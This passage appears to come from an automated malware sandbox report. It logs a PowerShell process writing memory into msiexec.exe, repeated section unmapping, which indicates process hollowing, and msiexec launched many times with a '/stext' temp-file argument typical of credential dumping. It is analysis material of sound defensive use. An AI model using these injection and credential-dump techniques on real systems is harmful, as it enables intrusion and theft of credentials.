              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4480000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cteoqfjrqshyc"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknownJump to behavior
